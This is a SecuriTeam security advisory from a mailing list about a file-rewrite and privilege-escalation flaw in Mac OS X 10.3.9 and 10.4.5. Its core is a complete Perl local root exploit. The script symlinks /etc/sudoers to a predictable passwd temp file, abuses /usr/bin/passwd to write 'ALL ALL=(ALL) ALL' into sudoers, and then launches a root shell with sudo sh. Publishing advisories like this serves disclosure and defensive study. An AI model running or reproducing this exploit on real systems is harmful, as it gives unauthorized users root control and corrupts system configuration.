[EXPL] Apple Mac OS X File Rewrites and Privilege Escalation (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Apple Mac OS X File Rewrites and Privilege Escalation (Exploit)
------------------------------------------------------------------------


SUMMARY

Improper handling of file permissions allows attackers to rewrite file
content on Apple Mac OS X.

DETAILS

Vulnerable Systems:
* Mac OS X Version 10.3.9
* Mac OS X Server Version 10.3.9
* Mac OS X Version 10.4.5
* Mac OS X Server Version 10.4.5

Exploit:
#!/usr/bin/perl
#
# /usr/bin/passwd[OSX]: local root exploit.
#
# by: vade79/v9 v9@xxxxxxxxxxx (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)

use POSIX;

$fake_passwd="/tmp/xpasswd.$$";
$passwd_pid=($$ + 1);
$passwd_tempfile="/tmp/.pwtmp.$passwd_pid";
$sudoers="/etc/sudoers";

sub pexit{print("[!] @_.\n");exit(1);}
print("[*] /usr/bin/passwd[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fake_passwd);
print("[*] making fake password file. ($fake_passwd)\n");
open(FP,">$fake_passwd")||pexit("couldn't open/write to $fake_passwd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("[*] sym-linking $sudoers -> $passwd_tempfile.\n");
symlink($sudoers,$passwd_tempfile)||pexit("couldn't link files.");
print("[*] running /usr/bin/passwd on $fake_passwd.\n");
print("[*] (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fake_passwd \"ALL ALL=(ALL) ALL #\"");
print("\n[*] running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);

#EoF


ADDITIONAL INFORMATION

The information has been provided by <mailto:v9@xxxxxxxxxxx> v9.
The advisory can be found at:
<http://www.securiteam.com/securitynews/5MP011PI0E.html>
http://www.securiteam.com/securitynews/5MP011PI0E.html
The original article can be found at: <http://fakehalo.us/xosx-passwd.pl>
http://fakehalo.us/xosx-passwd.pl



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [TOOL] Macchanger - GNU MAC Changer
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... viewing/manipulating the MAC address of network interfaces. ... * Set another MAC of the same vendor ...
    (Securiteam)
  • [NEWS] Mac OS X Long argv[] Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... It is possible to cause the Mac OS X kernel to crash by specifying a long ... command line argument. ...
    (Securiteam)
  • [NEWS] AppleFileServer Remote Command Execution
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The AppleFileServer provides Apple Filing Protocol (AFP) services for both ... Mac OS X and Mac OS X server. ... remotely exploitable stack buffer overflow ...
    (Securiteam)
  • [UNIX] Apple Mac OS X CoreGraphics PDF Type1 Font Integer Overflow Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Apple Mac OS X CoreGraphics PDF Type1 Font Integer Overflow Vulnerability ... Exploitation of this issue allows an attacker to execute arbitrary code. ... PDF file on a website and entice a targeted user to open a URL. ...
    (Securiteam)
  • [NEWS] Mac OS X Dashboard Arbitrary Widget Injection
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... "Mac OS X is the latest version of the Mac OS, ... Dashboard in combination with Safari in Mac OS X contains a flaw that may ...
    (Securiteam)